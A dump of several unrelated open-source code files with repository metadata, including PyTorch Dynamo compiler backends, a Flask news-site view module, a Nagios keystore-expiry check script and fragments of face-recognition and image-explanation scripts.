image\n\n\n cv2.imshow('input1', resize1)\n #print(emb2)\n\n # t2 = cv2.imread('amit7.jpg')\n # resize1 = cv2.resize(t2, (160, 160))\n # resize13=facenet.prewhiten(resize1)\n # emb3= tReckon.getEmbedding(resize13)\n\n\n\n \n # this function is for the live feed delivered to the python function\n\n\n Result = np.array(image[ymin:ymax,xmin:xmax])\n a= uuid.uuid4()\n inimg = image[ymin-30:ymax+30,xmin-30:xmax+30]\n resize15 = cv2.resize(inimg, (160, 160))\n resize=facenet.prewhiten(resize15)\n\n\n\n cv2.imshow('input2', resize15)\n #cv2.imwrite(\"E:/aknownymous/tensorflow-face-detection-master/images/\" + str(a) + \".jpg\", resize15)\n \n\n\n emb1= tReckon.getEmbedding(resize15)\n\n rez = np.sum(emb2*emb1,axis=1)\n print('cosine')\n\n print(rez)\n print('eculidian')\n\n dist = np.sqrt(np.sum(np.square(np.subtract(emb1[0,:],emb2[0,:]))))\n print(dist)\n\n # sql = \"SELECT * FROM aknownymousdb.id_encoding_table\"\n # mycursor.execute(sql)\n\n # myresult = mycursor.fetchall()\n\n # for x in myresult:\n # print(x)\n\n\n\n\n\n\n\n\n\n if windowNotSet is True:\n #cv2.namedWindow(\"tensorflow based (%d, %d)\" % (w, h), cv2.WINDOW_NORMAL)\n windowNotSet = False\n\n #cv2.imshow(\"tensorflow based (%d, %d)\" % (w, h), image)\n k = cv2.waitKey(1) & 0xff\n if k == ord('q') or k == 27:\n break\n\n cap.release()\n","repo_name":"amitsaini0001/focus-face-recognition-with-tensorflow","sub_path":"inference_usbCam_face.py","file_name":"inference_usbCam_face.py","file_ext":"py","file_size_in_byte":8327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30324500100","text":"import 
copy\nimport functools\nimport io\nimport logging\nimport os\nimport subprocess\nimport tempfile\n\nfrom typing import Dict\n\nimport numpy as np\n\nimport torch\nfrom ..output_graph import CompilerFn\n\nfrom ..utils import identity\nfrom .subgraph import SubGraph\n\nlog = logging.getLogger(__name__)\nBACKENDS: Dict[str, CompilerFn] = dict()\n_NP_DTYPE = {\n torch.float16: np.float16,\n torch.float32: np.float32,\n torch.float64: np.float64,\n torch.uint8: np.uint8,\n torch.int8: np.int8,\n torch.int16: np.int16,\n torch.int32: np.int32,\n torch.int64: np.longlong,\n torch.bool: np.bool_,\n}\n\n\ndef register_backend(fn):\n @functools.wraps(fn)\n def inner(gm, example_inputs, **kwargs):\n return fn(gm, example_inputs, **kwargs)\n\n BACKENDS[fn.__name__] = inner\n return inner\n\n\ndef create_backend(fn):\n @functools.wraps(fn)\n def inner(model, example_inputs=None, **kwargs):\n if model is None:\n return None\n\n if not isinstance(model, SubGraph):\n with tempfile.TemporaryDirectory() as tmp:\n return inner(SubGraph(model, example_inputs, tmp), **kwargs)\n else:\n assert example_inputs is None\n\n try:\n return fn(model, **kwargs)\n except KeyboardInterrupt:\n raise\n\n BACKENDS[fn.__name__] = inner\n return inner\n\n\n@create_backend\ndef eager(subgraph):\n return subgraph.model\n\n\n@create_backend\ndef ts(subgraph):\n return subgraph.scripted\n\n\ndef reload_jit_model(subgraph, opt_fn=identity):\n tmp = io.BytesIO()\n torch.jit.save(subgraph.scripted, tmp)\n tmp.seek(0)\n model = torch.jit.load(tmp)\n model = opt_fn(model)\n # populate cache\n for _ in range(3):\n model(*subgraph.example_inputs)\n return model\n\n\ndef reload_jit_model_ofi(subgraph):\n return reload_jit_model(subgraph, torch.jit.optimize_for_inference)\n\n\n@create_backend\ndef nnc(subgraph):\n with torch.jit.fuser(\"fuser1\"):\n return reload_jit_model(subgraph)\n\n\n@create_backend\ndef nnc_ofi(subgraph):\n with torch.jit.fuser(\"fuser1\"):\n return reload_jit_model_ofi(subgraph)\n\n\n@create_backend\ndef ts_nvfuser(subgraph):\n with torch.jit.fuser(\"fuser2\"):\n return reload_jit_model(subgraph)\n\n\n@create_backend\ndef ts_nvfuser_ofi(subgraph):\n with torch.jit.fuser(\"fuser2\"):\n return reload_jit_model_ofi(subgraph)\n\n\n@create_backend\ndef onednn(subgraph):\n with torch.jit.fuser(\"fuser3\"):\n return reload_jit_model(subgraph)\n\n\n@create_backend\ndef ofi(subgraph):\n return torch.jit.optimize_for_inference(subgraph.scripted)\n\n\n@create_backend\ndef static_runtime(subgraph):\n scripted = subgraph.scripted\n if hasattr(scripted, \"_c\"):\n static_module = torch._C._jit_to_static_module(scripted._c)\n else:\n static_module = torch._C._jit_to_static_module(scripted.graph)\n return subgraph.wrap_returns(static_module)\n\n\ndef onnxrt_common(subgraph, provider, onnx_filename=None):\n import onnxruntime # type: ignore[import]\n\n assert provider in onnxruntime.get_available_providers()\n session = onnxruntime.InferenceSession(\n onnx_filename or subgraph.onnx_filename, providers=[provider]\n )\n input_names = subgraph.input_names\n output_names = subgraph.output_names\n create_outputs = subgraph.empty_outputs_factory()\n is_cpu = subgraph.is_cpu\n\n def _call(*initial_args):\n binding = session.io_binding()\n args = [a.contiguous() for a in initial_args]\n for name, value in zip(input_names, args):\n dev = value.device\n binding.bind_input(\n name,\n dev.type,\n dev.index or 0,\n _NP_DTYPE[value.dtype],\n value.size(),\n value.data_ptr(),\n )\n outputs = create_outputs()\n for name, value in zip(output_names, 
outputs):\n dev = value.device\n binding.bind_output(\n name,\n dev.type,\n dev.index or 0,\n _NP_DTYPE[value.dtype],\n value.size(),\n value.data_ptr(),\n )\n session.run_with_iobinding(binding)\n if is_cpu:\n binding.copy_outputs_to_cpu()\n return outputs\n\n return subgraph.wrap_returns(_call)\n\n\n@create_backend\ndef onnxrt_cpu(subgraph):\n return onnxrt_common(subgraph, provider=\"CPUExecutionProvider\")\n\n\n@create_backend\ndef onnxrt_cuda(subgraph):\n return onnxrt_common(subgraph, provider=\"CUDAExecutionProvider\")\n\n\n@create_backend\ndef onnx2tensorrt(subgraph):\n if subgraph.will_tensorrt_barf():\n # TensorRT fails violently with an abort() on this\n return None\n\n return onnxrt_common(subgraph, provider=\"TensorrtExecutionProvider\")\n\n\n@create_backend\ndef onnxrt_cpu_numpy(subgraph, provider=\"CPUExecutionProvider\"):\n \"\"\"Alternate version that integrates via numpy\"\"\"\n import onnxruntime\n\n assert provider in onnxruntime.get_available_providers()\n ort_session = onnxruntime.InferenceSession(\n subgraph.onnx_filename, providers=[provider]\n )\n\n def to_numpy(x):\n try:\n return x.numpy()\n except RuntimeError:\n return x.detach().numpy()\n\n def _call(*args):\n res = ort_session.run(\n None, {f\"i{i}\": to_numpy(arg) for i, arg in enumerate(args)}\n )\n res = [torch.from_numpy(x) for x in res]\n return res\n\n return subgraph.wrap_returns(_call)\n\n\n@create_backend\ndef onnxrt(subgraph):\n if subgraph.is_cuda:\n return onnxrt_cuda(subgraph)\n else:\n return onnxrt_cpu(subgraph)\n\n\n@functools.lru_cache(None)\ndef _init_tensorflow():\n import tensorflow as tf # type: ignore[import]\n\n # prevent tensorflow from eating all the GPU memory\n gpus = tf.config.list_physical_devices(\"GPU\")\n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n return tf\n\n\n@create_backend\ndef onnx2tf(subgraph):\n import onnx # type: ignore[import]\n from onnx_tf.backend import prepare # type: ignore[import]\n\n tf = _init_tensorflow()\n filename = subgraph.filename(\"tensorflow\")\n input_names = subgraph.input_names\n output_names = subgraph.output_names\n device = \"/CPU:0\" if subgraph.is_cpu else f\"/GPU:{subgraph.device_index}\"\n with tf.device(device):\n if not os.path.exists(filename):\n prepare(onnx.load(subgraph.onnx_filename)).export_graph(filename)\n tf_module = tf.saved_model.load(filename)\n tf_module = tf.function(tf_module, jit_compile=True)\n\n def run(*i_args):\n args = [a.contiguous() for a in i_args]\n with tf.device(device):\n outs = tf_module(\n **{\n name: tf.experimental.dlpack.from_dlpack(\n torch.utils.dlpack.to_dlpack(args[idx])\n )\n for idx, name in enumerate(input_names)\n }\n )\n return [\n torch.utils.dlpack.from_dlpack(\n tf.experimental.dlpack.to_dlpack(outs[name])\n )\n for name in output_names\n ]\n\n return subgraph.wrap_returns(run)\n\n\n@create_backend\ndef taso(subgraph):\n taso_filename = subgraph.filename(\"taso\")\n subprocess.check_call(\n [\n os.path.expanduser(\"~/conda/envs/taso/bin/python\"),\n \"-c\",\n \"import taso,onnx; onnx.save(taso.export_onnx(taso.optimize(\"\n f\"taso.load_onnx('{subgraph.onnx_filename}'))), '{taso_filename}')\",\n ]\n )\n return onnxrt_common(\n subgraph, provider=\"CUDAExecutionProvider\", onnx_filename=taso_filename\n )\n\n\n@create_backend\ndef ipex(subgraph, **kwargs):\n import intel_extension_for_pytorch as ipex # type: ignore[import]\n\n inputs = subgraph.example_inputs\n model = subgraph.model\n with torch.no_grad():\n model.eval()\n if kwargs[\"datatype\"] == \"bf16\":\n model 
= ipex.optimize(model, dtype=torch.bfloat16)\n else:\n model = ipex.optimize(model, dtype=torch.float32)\n try:\n traced_model = torch.jit.trace(model, inputs).eval()\n traced_model = torch.jit.freeze(traced_model)\n return traced_model\n except Exception:\n log.warning(\"JIT trace failed during the 'ipex' optimize process.\")\n return model\n\n\ndef _raise_timeout(signum, frame):\n raise TimeoutError()\n\n\n@create_backend\ndef fx2trt(subgraph, **kwargs):\n if subgraph.will_tensorrt_barf():\n # TensorRT fails violently with an abort() on this\n return None\n\n from torch_tensorrt.fx.fx2trt import ( # type: ignore[import]\n InputTensorSpec,\n TRTInterpreter,\n )\n from torch_tensorrt.fx.passes.lower_basic_pass import ( # type: ignore[import]\n transform_setitem,\n )\n from torch_tensorrt.fx.tools.trt_splitter import ( # type: ignore[import]\n TRTSplitter,\n TRTSplitterSetting,\n )\n from torch_tensorrt.fx.tracer.acc_tracer import acc_tracer # type: ignore[import]\n from torch_tensorrt.fx.trt_module import TRTModule # type: ignore[import]\n from torch_tensorrt.fx.utils import LowerPrecision # type: ignore[import]\n\n from .normalize import normalize_ir\n\n try:\n model = subgraph.model\n inputs = subgraph.example_inputs\n # normalize\n model = normalize_ir(model, inputs)\n # pass rewrite\n model = transform_setitem(model, inputs)\n acc_model = acc_tracer.trace(model, inputs)\n # Split out unsupported ops\n splitter_setting = TRTSplitterSetting()\n splitter_setting.use_implicit_batch_dim = False\n splitter = TRTSplitter(acc_model, inputs, settings=splitter_setting)\n splitter.node_support_preview()\n split_mod = splitter()\n num_piece = 0\n for name, _ in split_mod.named_children():\n print(f\"graph is split into {name}\")\n num_piece += 1\n\n # if the graph module is split into pieces larger than 8, we consider its perf\n # is not good and fall back to non-TRT\n if num_piece > 8:\n print(\n f\"The graph module is split into {num_piece} which is large than the \\\n threshold=8. 
Fall back to non-TRT module.\"\n )\n return None\n\n if \"fp16_mode\" in kwargs and kwargs[\"fp16_mode\"]:\n precision = LowerPrecision.FP16\n else:\n precision = LowerPrecision.FP32\n\n def get_submod_inputs(mod, submod, inputs):\n acc_inputs = None\n\n def get_input(self, inputs):\n nonlocal acc_inputs\n acc_inputs = inputs\n\n handle = submod.register_forward_pre_hook(get_input)\n mod(*inputs)\n handle.remove()\n return acc_inputs\n\n for name, _ in split_mod.named_children():\n if \"_run_on_acc\" in name:\n submod = getattr(split_mod, name)\n # print(\"acc=\",submod.code)\n # Get submodule inputs for fx2trt\n acc_inputs = get_submod_inputs(split_mod, submod, inputs)\n\n # fx2trt replacement\n interp = TRTInterpreter(\n submod,\n InputTensorSpec.from_tensors(acc_inputs),\n explicit_batch_dimension=True,\n )\n r = interp.run(\n max_workspace_size=20 << 30,\n lower_precision=precision,\n # profiling_verbosity=trt.ProfilingVerbosity.DETAILED, #For profile\n )\n # For profile\n # from fx2trt_oss.fx.tools.trt_profiler_sorted import profile_trt_module\n # profile_trt_module(\"\", trt_mod, acc_inputs)\n trt_mod = TRTModule(*r)\n\n setattr(split_mod, name, trt_mod)\n else:\n submod = getattr(split_mod, name)\n # print(\"gpu=\",submod.code)\n return subgraph.wrap_returns(split_mod)\n except Exception:\n log.exception(\"FX2TRT conversion error\")\n return None\n\n\n@create_backend\ndef torch2trt(subgraph):\n if subgraph.will_tensorrt_barf():\n # TensorRT fails violently with an abort() on this\n return None\n\n from torch2trt import torch2trt # type: ignore[import]\n\n inputs = subgraph.example_inputs\n trt_mod = torch2trt(\n subgraph.model,\n inputs,\n max_batch_size=len(inputs[0]),\n strict_type_constraints=True,\n )\n return subgraph.wrap_returns(trt_mod)\n\n\n@create_backend\ndef tensorrt(subgraph):\n if subgraph.will_tensorrt_barf():\n # TensorRT fails violently with an abort() on this\n return None\n\n model = onnx2tensorrt(subgraph)\n if model is None:\n model = torch2trt(subgraph)\n return model\n\n\n@create_backend\ndef cudagraphs(subgraph):\n model = subgraph.model\n inputs = subgraph.example_inputs\n assert subgraph.is_cuda\n return subgraph.wrap_returns(cudagraphs_inner(model, inputs))\n\n\n@create_backend\ndef cudagraphs_ts(subgraph):\n assert subgraph.is_cuda\n model = subgraph.scripted\n inputs = subgraph.example_inputs\n\n # warmup\n for _ in range(3):\n model(*inputs)\n\n return subgraph.wrap_returns(cudagraphs_inner(model, inputs))\n\n\n@create_backend\ndef cudagraphs_ts_ofi(subgraph):\n assert subgraph.is_cuda\n model = torch.jit.optimize_for_inference(torch.jit.freeze(subgraph.scripted))\n inputs = subgraph.example_inputs\n\n # warmup\n for _ in range(3):\n model(*inputs)\n\n return subgraph.wrap_returns(cudagraphs_inner(model, inputs))\n\n\ndef cudagraphs_inner(model, inputs, copy_outputs=True):\n assert isinstance(inputs, (list, tuple))\n static_inputs = [torch.zeros_like(x) for x in inputs]\n\n # warmup\n torch.cuda.synchronize()\n stream = torch.cuda.Stream()\n stream.wait_stream(torch.cuda.current_stream())\n with torch.cuda.stream(stream):\n model(*inputs)\n stream.synchronize()\n torch.cuda.current_stream().wait_stream(stream)\n torch.cuda.synchronize()\n\n # record\n graph = torch.cuda.CUDAGraph()\n with torch.cuda.graph(graph, stream=stream):\n static_outputs = model(*static_inputs)\n if not isinstance(static_outputs, (list, tuple)):\n static_outputs = (static_outputs,)\n\n def run(*new_inputs):\n assert len(static_inputs) == len(new_inputs)\n for dst, src in 
zip(static_inputs, new_inputs):\n dst.copy_(src)\n graph.replay()\n if copy_outputs:\n return [x.clone() for x in static_outputs]\n else:\n return static_outputs\n\n return run\n\n\ndef tvm_compile(jit_mod, example_inputs, log_file=None, **kwargs):\n if jit_mod is None:\n return None\n try:\n return tvm_compile_inner(jit_mod, example_inputs, None, log_file, **kwargs)\n except Exception as e:\n if log_file and os.path.exists(log_file):\n os.unlink(log_file)\n if isinstance(e, KeyboardInterrupt):\n raise\n log.exception(\"tvm error\")\n return None\n\n\n@create_backend\ndef tvm(subgraph):\n return subgraph.wrap_returns(\n tvm_compile_inner(\n subgraph.scripted,\n subgraph.example_inputs,\n tuning_option=None,\n cuda=subgraph.is_cuda,\n )\n )\n\n\n@create_backend\ndef ansor(subgraph):\n \"\"\"\n WARNING: this backend takes hours or days to train and\n often produces a slower result than the default schedule.\n \"\"\"\n return subgraph.wrap_returns(\n tvm_compile_inner(\n subgraph.scripted,\n subgraph.example_inputs,\n tuning_option=\"auto_scheduler\",\n log_file=subgraph.filename(\"ansor\"),\n cuda=subgraph.is_cuda,\n )\n )\n\n\n@create_backend\ndef tvm_meta_schedule(subgraph):\n return subgraph.wrap_returns(\n tvm_compile_inner(\n subgraph.scripted,\n subgraph.example_inputs,\n tuning_option=\"meta_schedule\",\n trials=20000,\n cuda=subgraph.is_cuda,\n )\n )\n\n\n@functools.lru_cache(None)\ndef llvm_target():\n if \"avx512\" in open(\"/proc/cpuinfo\").read():\n return \"llvm -mcpu=skylake-avx512\"\n return \"llvm -mcpu=core-avx2\"\n\n\ndef tvm_compile_inner(\n jit_mod, example_inputs, tuning_option=None, log_file=None, trials=20000, cuda=False\n):\n try:\n import tvm # type: ignore[import]\n from tvm import relay # type: ignore[import]\n from tvm.contrib import graph_executor # type: ignore[import]\n\n shape_list = [(f\"inp_{idx}\", i.shape) for idx, i in enumerate(example_inputs)]\n mod, params = relay.frontend.from_pytorch(jit_mod, shape_list)\n if cuda:\n dev = tvm.cuda(0)\n target = tvm.target.cuda()\n else:\n dev = tvm.cpu(0)\n target = tvm.target.Target(llvm_target())\n\n if tuning_option == \"auto_scheduler\":\n from tvm import auto_scheduler\n\n if log_file is None:\n log_file = tempfile.NamedTemporaryFile()\n if not os.path.exists(log_file):\n tasks, task_weights = auto_scheduler.extract_tasks(\n mod[\"main\"], params, target\n )\n for task in tasks:\n print(task.compute_dag)\n else:\n print(\"No tasks\")\n if len(tasks) != 0:\n tuner = auto_scheduler.TaskScheduler(tasks, task_weights)\n if not os.path.exists(log_file):\n assert trials > 0\n tune_option = auto_scheduler.TuningOptions(\n num_measure_trials=trials,\n measure_callbacks=[auto_scheduler.RecordToFile(log_file)],\n early_stopping=2000,\n )\n try:\n tuner.tune(tune_option)\n except Exception:\n if os.path.exists(log_file):\n os.unlink(log_file)\n raise\n\n with auto_scheduler.ApplyHistoryBest(log_file):\n with tvm.transform.PassContext(\n opt_level=3, config={\"relay.backend.use_auto_scheduler\": True}\n ):\n lib = relay.build(mod, target=target, params=params)\n elif tuning_option == \"meta_schedule\":\n from os import path as osp\n\n from tvm import meta_schedule as ms\n\n with tempfile.TemporaryDirectory() as work_dir:\n if log_file is not None:\n assert osp.isdir(\n log_file\n ), \"TVM's meta_schedule requires a directory for storing log files.\"\n work_dir = log_file\n # TODO(shingjan): This could be replaced by tvm.contrib.torch.optimize_torch\n # once USE_PT_TVMDSOOP is updated and turned on by default in TVM.\n 
database = ms.relay_integration.tune_relay(\n mod=mod,\n target=target,\n work_dir=work_dir,\n max_trials_global=20000,\n num_trials_per_iter=64,\n params=params,\n strategy=\"evolutionary\",\n )\n lib = ms.relay_integration.compile_relay(\n database=database,\n mod=mod,\n target=target,\n params=params,\n )\n\n elif tuning_option is None:\n # no autotuning (for debugging)\n with tvm.transform.PassContext(opt_level=10):\n lib = relay.build(mod, target=target, params=params)\n else:\n raise NotImplementedError(\n \"This tuning option is invalid/not implemented for torchdynamo's TVM-related backend. \"\n \"There are three available options including None, auto_scheduler and meta_schedule.\"\n )\n m = graph_executor.GraphModule(lib[\"default\"](dev))\n\n def to_torch_tensor(nd_tensor):\n \"\"\"A helper function to transfer a NDArray to torch.tensor.\"\"\"\n if nd_tensor.dtype == \"bool\":\n # DLPack does not support boolean so it can't be handled by\n # torch.utils.dlpack.from_pack. Workaround by going through\n # numpy, although this brings additional data copy overhead.\n return torch.from_numpy(nd_tensor.numpy())\n return torch.utils.dlpack.from_dlpack(nd_tensor.to_dlpack())\n\n def exec_tvm(*i_args):\n args = [a.contiguous() for a in i_args]\n for idx, arg in enumerate(args, 0):\n if arg.dim() != 0:\n if arg.requires_grad:\n arg = arg.detach()\n m.set_input(\n f\"inp_{idx}\",\n tvm.nd.array(arg.numpy(), dev),\n )\n m.run()\n return [\n to_torch_tensor(m.get_output(i)) for i in range(m.get_num_outputs())\n ]\n\n return exec_tvm\n except Exception:\n log.exception(\"tvm error\")\n return jit_mod # explicit fall back to eager\n\n\n@functools.lru_cache(None)\ndef _init_ltc():\n try:\n import torch._lazy.extract_compiled_graph\n from torch._lazy.ts_backend import init as init_ts_backend\n\n # hopefully changing this line to sth like _ltc_init_xla_backend in future\n # will enable XLA\n init_ts_backend()\n\n return torch._lazy\n except ModuleNotFoundError as e:\n print(f\"ltc backend fails. 
Can not import {e.name}\")\n raise\n\n\ndef ltc_reuse_graph(gm: torch.fx.GraphModule, example_inputs):\n ltc = _init_ltc()\n return ltc.extract_compiled_graph.extract_compiled_graph(gm, example_inputs)\n\n\ndef ltc_trivial(gm: torch.fx.GraphModule, example_inputs):\n ltc = _init_ltc()\n lazy_model = copy.deepcopy(gm).to(device=\"lazy\")\n ltc.extract_compiled_graph.force_lazy_device(lazy_model)\n\n def ltc_model(*inputs):\n orig_device = inputs[0].device if len(inputs) > 0 else \"cuda\"\n lazy_inputs = tuple(inp.to(device=\"lazy\") for inp in inputs)\n\n lazy_out = lazy_model(*lazy_inputs)\n out = tuple(out.to(device=orig_device) for out in lazy_out)\n return out\n\n return ltc_model\n\n\n@create_backend\ndef torchxla_trivial(subgraph):\n return subgraph.model\n\n\n@create_backend\ndef torchxla_trace_once(subgraph):\n import torch._dynamo.optimizations.torchxla_integration as integration\n\n compiled_graph = None\n model = subgraph.model\n\n def fwd(*args):\n nonlocal subgraph\n nonlocal compiled_graph\n if compiled_graph is None:\n compiled_graph = integration.extract_compiled_graph(model, args)\n del subgraph\n return compiled_graph(*args)\n\n return fwd\n\n\ndef ipex_fp32(gm: torch.fx.GraphModule, example_inputs):\n kwargs_ipex = {\"datatype\": \"fp32\"}\n return BACKENDS[\"ipex\"](gm, example_inputs, **kwargs_ipex)\n\n\ndef ipex_bf16(gm: torch.fx.GraphModule, example_inputs):\n kwargs_ipex = {\"datatype\": \"bf16\"}\n return BACKENDS[\"ipex\"](gm, example_inputs, **kwargs_ipex)\n\n\ndef fx2trt_compiler_fp16(gm: torch.fx.GraphModule, example_inputs):\n kwargs_fx2trt = {\"fp16_mode\": True}\n trt_compiled = BACKENDS[\"fx2trt\"](gm, example_inputs, **kwargs_fx2trt)\n if trt_compiled is not None:\n return trt_compiled\n else:\n print(\n \"FX2TRT conversion failed on the subgraph. Return GraphModule forward instead\"\n )\n return gm.forward\n\n\ndef fx2trt_compiler(gm: torch.fx.GraphModule, example_inputs):\n kwargs_fx2trt = {\"fp16_mode\": False}\n trt_compiled = BACKENDS[\"fx2trt\"](gm, example_inputs, **kwargs_fx2trt)\n if trt_compiled is not None:\n return trt_compiled\n else:\n print(\n \"FX2TRT conversion failed on the subgraph. Return GraphModule forward instead\"\n )\n return gm.forward\n","repo_name":"robit-man/AGX-ORIN-TORCH-PACKAGES","sub_path":"site-packages/torch/_dynamo/optimizations/backends.py","file_name":"backends.py","file_ext":"py","file_size_in_byte":24188,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21149377994","text":"class Solution:\n def slowestKey(self, releaseTimes: List[int], keysPressed: str) -> str:\n # Time and Space Complexity: O(N)\n durations = {}\n for i, char in enumerate(keysPressed):\n start = 0 if not i else releaseTimes[i - 1]\n duration = releaseTimes[i] - start\n durations[char] = max(duration, durations.get(char, 0))\n\n return max([(durations[char], char) for char in durations])[1]\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/1629. 
Slowest Key/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"33035783376","text":"from flask import current_app, render_template, session, request, jsonify\n\nfrom Info.constants import CLICK_RANK_MAX_NEWS, HOME_PAGE_MAX_NEWS\nfrom Info.models import User, News, Category\nfrom Info.modules.home import home_blu\n\n\n# 2. Use the blueprint to register the routes\nfrom Info.utils.response_code import RET, error_map\n\n\n@home_blu.route('/')\ndef index():\n # Check whether the user is logged in\n user_id = session.get(\"user_id\")\n user = None # in some edge cases user_id has no value and nothing can be fetched from the database, but the template must still receive a value, so user has to be initialized\n if user_id:\n # Query the user model by user_id\n try:\n user = User.query.get(user_id)\n except Exception as e:\n current_app.logger.error(e)\n # Pass the user's login info to the template\n user = user.to_dict() if user else None # ternary expression: wrap the user model's data in a dict (call to_dict() if user exists, otherwise user stays None)\n\n # Query news ordered by clicks in descending order and take the top 10\n rank_list = []\n try:\n rank_list = News.query.order_by(News.clicks.desc()).limit(CLICK_RANK_MAX_NEWS).all()\n except Exception as e:\n current_app.logger.error(e)\n\n rank_list = [news.to_basic_dict() for news in rank_list]\n\n # The categories were hard-coded in the original HTML page; here they are fetched from the database for global rendering\n categories = []\n try:\n categories = Category.query.all()\n except Exception as e:\n current_app.logger.error(e)\n\n return render_template(\"news/index.html\", user=user, rank_list=rank_list, categories=categories) # do not call user.to_dict() inline here, because user may be None and that would raise an error\n\n\n# Serve the favicon (the browser requests it only once, and will not request it again whether or not it got a response)\n@home_blu.route('/favicon.ico')\ndef favicon():\n # send_static_file returns a static file (see the day08 personal notes for details)\n return current_app.send_static_file(\"news/favicon.ico\")\n\n\n# Get the news list\n@home_blu.route('/get_news_list')\ndef get_news_list():\n # Get the parameters\n cid = request.args.get(\"cid\") # news category\n cur_page = request.args.get(\"cur_page\") # current page number\n per_count = request.args.get(\"per_count\", HOME_PAGE_MAX_NEWS) # number of news items per page\n # Validate the parameters\n if not all([cid, cur_page]):\n return jsonify(errno=RET.PARAMERR, errmsg=error_map[RET.PARAMERR])\n\n # Convert the parameters to int (data taken from the request is always str)\n try:\n cid = int(cid)\n per_count = int(per_count)\n cur_page = int(cur_page)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.PARAMERR, errmsg=error_map[RET.PARAMERR])\n\n filter_list = [News.status == 0] # only articles that passed review can be displayed\n if cid != 1: # category 1 is not a real category but 'latest' (ordered by publish time)\n filter_list.append(News.category_id == cid)\n # Query the news by the parameters: paginate per category, ordered by creation date descending\n try:\n pn = News.query.filter(*filter_list).order_by(News.create_time.desc()).paginate(cur_page, per_count)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=error_map[RET.DBERR])\n\n data = {\n \"news_list\": [news.to_dict() for news in pn.items], # custom objects cannot be serialized to a JSON string, so convert them to dicts\n \"total_page\": pn.pages # helps the front end detect the last page\n }\n\n # Return the data as JSON\n return jsonify(errno=RET.OK, errmsg=error_map[RET.OK], data=data)\n","repo_name":"CcLmL/InfoNews","sub_path":"Info/modules/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3684,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9783455660","text":"#!/usr/bin/env python\n# or !/usr/bin/env python3 depending on the version you have\n\nfrom datetime import datetime\nimport subprocess\nimport sys\n\ntoday = datetime.now()\n\n\ndef get_expiration_from_file(ksName,passphrase):\n with open(ksName) as c:\n try:\n # Command that is run here: keytool -list -v -keystore example.jks -storepass 12345678\n 
nextUpdate = subprocess.check_output([\"/usr/bin/keytool\", \"-list\", \"-v\",\"-keystore\", ksName,\"-storepass\",passphrase], stderr=subprocess.STDOUT).decode('ascii')\n nextUpdate = nextUpdate.split(\"until: \")\n nextUpdate = nextUpdate[1:]\n \n results = []\n for cert in nextUpdate:\n cert = cert.split(\"\\n\")[0]\n # Data before splitting: 'Fri Sep 09 20:04:04 CEST 2022'\n exp_date = datetime.strptime(cert, \"%a %b %d %H:%M:%S %Z %Y\")\n results.append(is_expired(exp_date))\n return results\n except subprocess.CalledProcessError as e:\n print(\"Error reading cert file\")\n sys.exit(2)\n\n\ndef is_expired(exp):\n days_to_exp = (exp-today).days\n if days_to_exp <= 15:\n r = [2, (\"CRITICAL Cert about to expire or already expired, run for your lives! : {0} days to expiration\".format(\n days_to_exp))]\n elif days_to_exp < 30:\n r = [2, (\"CRITICAL Cert expiration in less than 30 days: {0} days to expiration\".format(\n days_to_exp))]\n elif days_to_exp < 60:\n r = [1, (\"WARNING Cert expiration in less than 60 days: {0} days to expiration\".format(\n days_to_exp))]\n else:\n r = [\n 0, (\"OK Cert expires in : {0} days to expiration\".format(days_to_exp))]\n return r\n\n\nif len(sys.argv) == 3:\n alerts = get_expiration_from_file(sys.argv[1],sys.argv[2])\n message = \"\"\n maxalert = 0\n for r in alerts:\n if r[0] != 0: # use '!=' rather than 'is not': identity comparison with int literals is unreliable\n message += r[1]\n maxalert = max(maxalert, r[0])\n if maxalert == 0:\n print((\"OK Certs expire in more than {0} days\".format(60)))\n sys.exit(0)\n else: \n print(message)\n sys.exit(maxalert)\n\nelse:\n # Correct calling is ./check_jks.py example.jks 12345678\n print(\"UNKNOWN Plugin was not called correctly\")\n sys.exit(3)\n","repo_name":"franps/nagios-cryppy","sub_path":"check_keystore.py","file_name":"check_keystore.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71207293548","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 8 14:46:21 2020\r\n\r\n@author: TVermeire\r\n\"\"\"\r\n\r\n#%% Libraries\r\n\r\n#from __future__ import absolute_import, division, print_function, unicode_literals\r\nimport time\r\nimport matplotlib.pylab as plt\r\nimport numpy as np\r\nimport PIL.Image as Image\r\nimport os\r\nfrom os import listdir\r\nimport pandas as pd\r\n\r\nimport tensorflow as tf\r\nimport tensorflow_hub as hub\r\n#from tensorflow.keras import layer\r\n\r\nfrom skimage.color import rgb2gray\r\nfrom skimage.filters import sobel\r\nfrom skimage.segmentation import felzenszwalb, slic, quickshift, watershed\r\nfrom skimage.segmentation import mark_boundaries\r\nfrom skimage.util import img_as_float\r\n\r\n\r\n#%% directory\r\n\r\nos.chdir(r'C:\\Users\\tvermeire\\Dropbox\\Doctoraat\\Applied Data Mining\\XAI images\\Spyder')\r\n\r\n#%% Explanation methods\r\nfrom sedc_time import sedc_time\r\n\r\n#%% Model import\r\n\r\nclassifier_url =\"https://tfhub.dev/google/tf2-preview/mobilenet_v2/classification/2\" #@param {type:\"string\"}\r\n\r\nIMAGE_SHAPE = (224, 224)\r\n\r\nclassifier = tf.keras.Sequential([\r\n hub.KerasLayer(classifier_url, input_shape=IMAGE_SHAPE+(3,))\r\n])\r\n\r\nlabels_path = tf.keras.utils.get_file('ImageNetLabels.txt','https://storage.googleapis.com/download.tensorflow.org/data/ImageNetLabels.txt')\r\nimagenet_labels = np.array(open(labels_path).read().splitlines())\r\n\r\n\r\n#%% Image import\r\n\r\n# Import function\r\ndef loadImages(path, imshape):\r\n imagesList = listdir(path)\r\n 